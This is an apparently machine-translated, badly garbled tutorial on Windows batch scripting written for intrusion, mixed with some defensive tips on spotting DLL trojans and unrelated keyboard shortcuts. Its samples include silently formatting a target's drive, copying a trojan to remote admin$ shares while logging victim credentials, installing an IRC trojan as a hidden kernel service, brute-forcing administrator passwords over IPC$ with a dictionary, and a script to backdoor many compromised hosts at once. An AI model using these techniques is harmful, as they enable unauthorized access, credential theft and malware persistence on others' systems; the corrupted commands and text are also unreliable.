Advanced Application of Batch 1 1. Simple batch of internal command batch of advanced use! ! Tips! ! ! Everyone is very familiar! The following introduction to several knowledge points of batch: 1: Use the FC command to check the Tutan tool: first establish a batch file ATM.BAT: Write code: @echo off dir c: / windows / system32 / *. EXE> C : ??. TXT DIR C: / Windows / System32 / *. DLL> C: ??. TXT 2: Create Batch File WLTS.BAT Write Code: @echo off dir c: / windows / system32 / *. DLL > c: /findexe.txt dir c: / windows / system32 / *. EXE> C: /FINDDLL.TXT FC C: ??. txt c: /findexe.txt> c: /exe.txt FC C: ?? .txt c: /finddll.txt> c: /dll.txt This will then run atm.bat on your machine after you suspect that there is a Trojan run WLTS.BAT and then in C: /exe.txt and dll.txt Look, you can see suspicious files! This is just a thinking! ! You can also use him to clear the junk file left when you uninstall the software! For example, in the registry! 2: Make a hard drive with the subste command! Example Subst x: C: ?? Where X is the folder 111 for the creation of the drive, 3: Use the subst command to hide 3.5 Drive Subst H: C: / ATM and put the ATM folder to read only! Restore: At the beginning - run -subst a: / d! !
1.echo command opens back or off request back function, or displays a message. If there is no parameters, the echo command will display the current echo setting. Syntax Echo [{ON | OFF}] [Message] Sample: @echo off / echo hello world In practical applications, we will combine this command and redirect symbol (also known as pipe symbol, generally> >> ^) To enable input some commands to a specific format. This will be reflected in the later examples. 2. The @ command indicates that the @ later command is not displayed during the intrusion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use. Sample: @echo off @echo now initializing the program ... @format x: / q / u / autoset (format This command can not use / y, the grateful is Microsoft left This parameter is the same as us, the effects, and / y is the same.) 3.GOTO command specifies that the jump to the label. After finding the label, the program will process the command starting from the next row. Syntax: goto label (Label is the parameter, specifies the row in the batch program you want to turn.) Sample: if {% 1} == {} goto noparms if {% 2} == {} goto noparms (if IF here ,% 1,% 2, you don't understand, first jump, there will be detailed explanation. But it is best to make sense letters, let a letter before: It is used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions. 4.Rem Command Comment command, quite with / * in the C language -------- * /, which does not be executed, just a comment, easy to read and modify it later. Rem message sample: @Rem Here is the description. 5.pause command When you run the PAUSE command, the following message will be displayed: press any key to turnue.. Sample: @echo off: begin copy a: *. * D: / BACK Echo Please Put A New Disk Into Driver a Pause Goto Begin In this example, all files on the disk in the drive A are copied to D: / back. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing. 6.Call Command From a batch program to another batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line. Syntax Call [[DRIVE:] [PATH] FILENAME [BATCHPARETERS]] [: label [arguments]] parameter [drive:} [path] filename Specifies the location and name of the batch program to be called.
The filename parameter must have a .bat or .cmd extension. The 7.start command calls an external program, all DOS commands and command line programs can be called by the start command. Intrusion Common Parameters: MIN Starting Window Minimizes Separate Separated Space In Separated Space Time 16 WINDOWS Program High In the High Priority Category Start Application RealTime Start the application WAIT launch application and wait for it to end Parameters These The application that is transmitted to the parameter executed by the command / program is a 32-bit GUI application, and the cmd.exe does not equal the application to the command prompt. If executed within the command script, the new behavior will not happen. 8.choice Command Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ..., such as: Choice / CME DEFRAG, MEM, END will display DEFRAG, MEM, END [D, M, E]? Sample: sample.bat is as follows: @echo off choice / cme defrag, MEM, END IF ERRORLEVEL 3 GOTO DEFRAG (The highest value of the highest value first) IF Errotlevel 1 Goto Mem if Errotlevel 1 Goto End Efrag C: / DOS / DEFRAG GOTO end: MEM MEM GOTO end: End echo good by this file run After the DEFRAG, MEM, END [D, E]? The user can select DME, and then the IF statement will make a judgment, and D represents the block segment that executes the label DEFRAG, and m represents a block, E of the label MEM. Indicates a block that executes the label End, and each block is finally jumped to the END Number with goto End, and then the program will display good Bye, the file ends.
Advanced Application of Batch 2 3. How to use the Compound Command 1. & usage: The first command & second command [& Article 3 Commands ...] can perform multiple commands at the same time Regardless of whether or not the order is executed Sample: C: C: C: /> DIR Z: & Dir C: / Ex4rch the system cannot Find the path specified. Volume in Drive C Has No Label. Volume Serial Number IS 0078-59FB Directory of C: / EX4RCH 2002-05-14 23:51
This usage can replace if EXIST :) 3. || USAGE: 1 command || Second command [|| Article 3 Commands ...] Use this method to perform multiple commands at the same time, when touching After performing the correct command, the following command will not be executed. If there is no correct command, all commands have been executed; sample: c: / ex4rch> Dir Sometips.gif || Del Sometips.gif Volume In Drive C Has No Label Volume Serial Number IS 0078-59FB Directory of C: / EX4RCH 2002-05-14 23:55 14 Sometips.gif 1 File (s) 14 BYTES 0 DIR (s) 768, 696, 320 BYtes Free Combination Command Used: Sample: @ Copy Trojan.exe //% 1 / Admin $ / SYSTEM32 && IF NOT Errorlevel 1 Echo IP% 1 User% 2 Pass% 3 >> Victim.txt No.4 444444444440 Article 2 Commands [| Article 3 Commands ...] Use the results of the first command as the parameters of the second command, remember to be common in this way in Unix. Sample: Time / >D: /ip.log netstat -n -p TCP | Find ": 3389" >> D: /ip.log start expected? Used for Terminal Services Allows us to customize the starting program for users to achieve the following BAT to get the IP of the login user. 2. >> Output Redirection command Redirects a command or an output result of a program to a specific file,> and >> Differences in>> Write the specified file after the contents in the file And >> Only the content will be added to the specified file without changing the content. Sample1: echo hello world> c: /Hello.txt (stupid eXample?) Sample2: DLL Trojan is prevalent, we know that SYSTEM32 is a good place to catch a hide, and many Trojans have turned the head to drill there. DLL Horse is no exception. For this, we can make a record on the EXE and DLL files under this directory after installing the system and the necessary applications: Run the CMD - Convert directory to System32 - Dir * .exe> EXEBACK.TXT & DIR * .dll> DLLBACK.TXT, so all the names of all EXE and DLL files are recorded in ExeBack.txt and DLLBACK.TXT, if they find abnormalities, if they find out, if they can be found with traditional methods, they should consider whether they are considered. The system has sneaked into the DLL Trojan. At this time, we record the exe and dll files under System32 with the same command to DLLBACK1.TXT, then run: cmd - fc execk.txt exeback1.txt> Diff.txt & FC DLLBACK.TXT DLLBACK1.TXT> Diff.txt. (with the FC command compares the DLL and EXE files before and after, and enter the result into Diff.txt), so we can find some more DLL and EXE files, and then easily determine whether it has been patron with DLL Trojans by viewing the creation time, version, whether or not compressed, etc.
No, if there is any words, don't drop it directly, first use the regsvr32 / u trojan.dll to remove the back door DLL file, move it to the recycle station, if the system does not exception reflection, then completely delete or Submit to anti-virus software. 3. <,> &, <&
2. Modify modification is relatively simple, just export you to the project you need to modify, then modify it with Notepad, then import (regedit / s). 3. Delete Let's first delete a project name, we create a file: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "EX4RCH" = - Execute this script, [HKEY_LOCAL_MACHINE / "EX4RCH" under Software / Microsoft / Run] is deleted; let's take a look at the delete a child, we create a script: Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / WINDOWS / Currentversion / run] Execute this script, [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] has been deleted. I believe it is .reg files you have already mastered. Then the current goal is to use batch to create a .reg file, remember that our previous use of redirect symbols can easily create specific types of files. Samlpe1: As the following example, if you want to generate the following registry file Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "Invader" = "EX4RCH" "Door" = HEX: 255 "Autodos" = dword: 000000128 just like this: @echo Windows Registry Editor Version 5.00 >> Sample.reg @echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]> Sample.reg @echo "Invader" = "Ex4rch" >> Sample.reg @echo "door" = 5 >> c: //winnt//system32//door.exe >> sample.reg @echo "autodos" = DWORD: 02 >> Sample.REG
Samlpe2: When we use some old Trojans, we may generate a key value to realize the Trojan's Start. But this is easy to expose the path to Trojans, causing the Trojan to be killing, relatively safe relative to the registration of Trojans as a system service. Below to configure the IRC Trojan DSNX as an example (named Windrv32.exe @start windrv32.exe @Attrib h r windrv32.exe @echo [hkey_local_machine / Software / Microsoft / Windows / CurrentVersion / Run] >> Patch.dll @echo "Windsnx" = - >> Patch.dll @sc. exe create Windriversrv type = kernel start = auto displayname = WindowsDriver binpath = c: /winnt/system32/windrv32.exe @regedit / s patch.dll @delete patch.dll @REM [delete DSNXDE startup items in the registry, with SC.EXE is registered as a system-critical service to set its properties to hide and read only, and config is started from starting] @rem is not a safer ^ _ ^. Some very good skills! (Can be called classic)
1. If there are multiple windows to open, if you want to close, you can press and hold the Shift and click Close Icon in the upper right corner of the window. 2. You can press the "ESC" button before saving the page (or offline) Save, so that it is so fast 3. Use the computer to listen to the CD. Do not have any play software, connect the speaker line directly to the optical drive's headphone hole, put it in the CD, press the PLAY button on the CD-ROM to listen directly, so listen to songs Can not occupy system resources. (If your computer is broken, you can't start or, what you can't repair it, don't waste resources, put the power supply in the use of the power to the optical drive, you can temporarily do the CD machine. 4.msn When you send a message, you can press Enter. If you want to change the wrap, you can Shift Enter or Ctrl Enter 5. The browser's address bar can debug a short HTML code. The method is as follows: Address bar Write about: ABC Entering, you will see the effect. 6.Windows shortcut: WIN M Show desktop WIN PAUSE system properties Quick restart: press SHIFT before determining (not suitable for 2k, xp). Remove Hift Del Let the disc automatically run: Press SHIFT CTRL ESC: Equivalent to "Start" or WIN button Ctrl Home: Move the cursor to the beginning of the text editing area (Home Single: Move to List) Ctrl End: Put the light The end point of the text editing area (End single: move to the column of column) Alt F4: Close the current window (if you click on the desktop again, it is turned off) F2: Change the name Windows E Export Manager. Windows R runs. Windows f lookup. Windows U turn off the system. Windows D minimizes all windows, then press Win D to return the window before minimizing the window. Windows M minimizes all windows, but then click once to return to the minimum The previous window. SHIFT F10, you can open the right-click menu of the selected item. Press and hold the Ctrl Shift Drag file: Create a shortcut. 7. Shuttle shortcut (1). Right click on the desktop blank position -> < New> -> Select
The advanced application of batch 39.if Command if indicates that it is determined if it meets the specified conditions, thereby deciding to perform different commands. There are three formats: 1, if "==" String "The command parameter to be executed is equal to the specified string, the condition is established, run the command, otherwise run the next sentence. (Note is two equal numbers), such as if "% 1" == "a" Format A: if {% 1} == {} goto noparms if {% 2} == {} goto nOPARMS 2, IF EXIST file name If the command to be executed If there is a specified file, the condition is established, run the command, otherwise run the next sentence. If if exist config.sys edit config.sys 3, if ErrorleVel / if not errorlevel digitally peers to be executed If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence. If the IF ErrorLevel 2 Goto X2 DOS program is running, a number will return to DOS, called error code errorlevel or return code, common return code is 0, 1. 10.FOR command for command is a more complex command, primarily for parameters to perform commands within the specified range. When using the for command in a batch file, specify the variable, please use %% Variable for {% Variable | %% Variable} in (SET) Do Command [commandLineOptions]% variable to specify a single letter replaceable parameter. (SET) Specify one or a set of files. You can use wildcards. Command specifies the command to execute each file. Command-parameters specifies parameters or command line switches for a specific command. When using the for command in a batch file, specify the variable, please use %% Variable without using% Variable. The variable name is case sensitive, so% i is different from% i if the command extension is enabled, the following additional for command format will be supported: for / d% variable in (set) do command [command-parameters] If concentrated Contains a wildcard, specify matching with the directory name without matching the file name. FOR / R [[DRIVE:] PATH]% Variable In (SET) Do Command [Command-Check Take the directory tree in [Drive:] Path, pointing to the for statement in each directory. If there is no specified directory after / r, use the current directory. If the set is only one single point (.) Character, the directory tree is enumerated. FOR / L% Variable in (Start, Step, End) Do Command [Command-Para This set represents a digital sequence from the beginning to the end in incremental form. Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will produce a sequence (5 4 3 2 1).
FOR / F ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") Do Command for / f ["Options"]% Variable in (Command) Do Command or if there is a usebackq option: for / f ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") do command for / f [" Options "]% Variable In (Command) do command filenameset is one or more file names. Before proceeding to the next file in the filenameset, each file has been opened, read and processed. Processing includes reading a file, dividing it into a line of rows, and analyzing each line into zero or more symbols. The FOR cycle is then called with the resulting symbol string variable value. With the default, / f is separated from the first blank symbol of each line of each file. Skip blank lines. You can replace the default resolution * by specifying the optional "Options" parameter. This band-quoted string includes one or more keywords that specify different parses options. These keywords are: eol = c - refers to the end of a row bet release character (one) Skip = n - refers to the number of rows ignored at the beginning of the file. Delims = xxx - Indicator jacket set. This default separator set replaces the space and the jumping. Tokens = x, y, m-n - means which symbols per row are passed to each iteration for itself. This will result in a range of additional variable names. Specify the last character as an asterisk in the M symbol string via the NTH symbol, then the additional variable will assign and accept the reserved text of the row in the last symbol. Usebackq - Specify new grammar has been used under the case: Perform a back quotation string as a command and the quotation marks characters are text string commands and allow the dual quotes to expand the file name in Fi. Sample1: for / f "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command will analyze every line in MyFile.txt, ignore those lines that are headers with a semicolon, will The second and third symbols in the row are passed to the forpriology; with a tend to be used with / or a space symbol. Note that the statement of this FOR program references% i to acquire the second symbol, reference% J to obtain the third symbol, refer to% K to get all the remaining symbols after the third symbol. For file names with spaces, you need to create files with double quotes. In this way, use dual quotes, you also need to use the UseBackQ option, otherwise, the dual quotation marks will be understood to be used as a string to define a certain analysis. % i is specifically description in the For statement,% J and% K are specifically demonstrated by the tokens = option. You can specify up to 26 symbols via tokens =, as long as you do not attempt to illustrate a variable above the letter Z or Z. Keep in mind that for variables are single letters, case sensitive and global; at the same time, there is not more than 52 or more. You can also use FOR / F analysis logic on adjacent strings; method is to enclose the filenameset between brackets with single quotes. Thus, the character serial will be regarded as a single input line in a file. Finally, you can use the for / f command to analyze the output of the command.
The method is to turn the filenameset between brackets into a hind string. This string will be regarded as a command line, pass to a sub-cmd.exe, and its output will be grasped into memory and is used as a file analysis. Therefore, the following example: for / f "UseBackQ Delims =="% I in (`set`) Do @echo% i enumerate the name of the environment variable in the current environment. In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following options: ~ i - Delete any quotation marks ("), expand% i% ~ FI - expand% i to a fully qualified path name% ~ Di - expand% i to a drive number% ~ pi - only expand% i to a path% ~ Ni - expand% i to a file name% ~ xi - expand% i to a file extension name% ~ Si - the extended path only contains short name% ~ AI - expand% i to file file attribute% ~ Ti - expand% i to file Date / time% ~ zi - expand% i to file size% ~ Path: i - Find column in the path environment The catalog of the variable and expand% i to the first fully qualified name. If the environment variable is not defined, or if the file is not found, this combined key will expand the empty string to combine the modifier to get multiple results:% ~ DPI - only expand% i to a drive letter and path% ~ nxi - only% i expand% i to a file name and extension% ~ fsi - only% i to a full path name with a short name ~ DP $ PATH: I - Find the directory column of the path environment variable and expand% i to the found first drive letter and path.% ~ ftzai - expand% i to the DIR of the similar output line in the above example, % I and PATH can be replaced with other effective values.% ~ Syntax is terminated with a valid for variable name. Select the big-write variable name similar to% i is more readily read, and avoid confusion with a combination of regardless casement. The above is MS Official help, let's take a few examples to specifically explain the use of the for command in the invasion. Sample2: Use the for command to implement the violent password for a target Win2k host. We use NET USE // IP / IPC $ " Password "/ u:" administrator "to try this to connect with the target host, and write a password when successful. The most important command is a: for / fi% in (dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator" uses I% to represent the password of Admin, this item takes the I% value in Dict.txt to connect. Then paste the program running result to find command - for / Fi %% in (Dict.txt) DO NET USE // IP / IPC $ "I %%" / u: "Administrator" | ": command successfully complete" >> D: /ok.txt, so KO . Sample3: Have you ever had a large number of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it.
The main order is only one: (when using the for command in the batch file, specify the variable using %% variable) @for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do Start Call door.bat %% I %% J %% k tokens Usage See Sample1 above, here it represents the parameter% I% J% K in door.bat in order. CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file. Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName. Code: --------------- Cut Here The Save As a Batchfile (i call it main.bat) ----------------- ---------- @ec "% 1" == "" goto usage @for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) DO START CALL IPCHACK.BAT %% I %% J %% K @goto end: usage @echo run this bath in dos mode.or Just double-click it.: end ------------- - Cut Here Then Save as a Batchfile (I Call it main.bat) ---------------------------
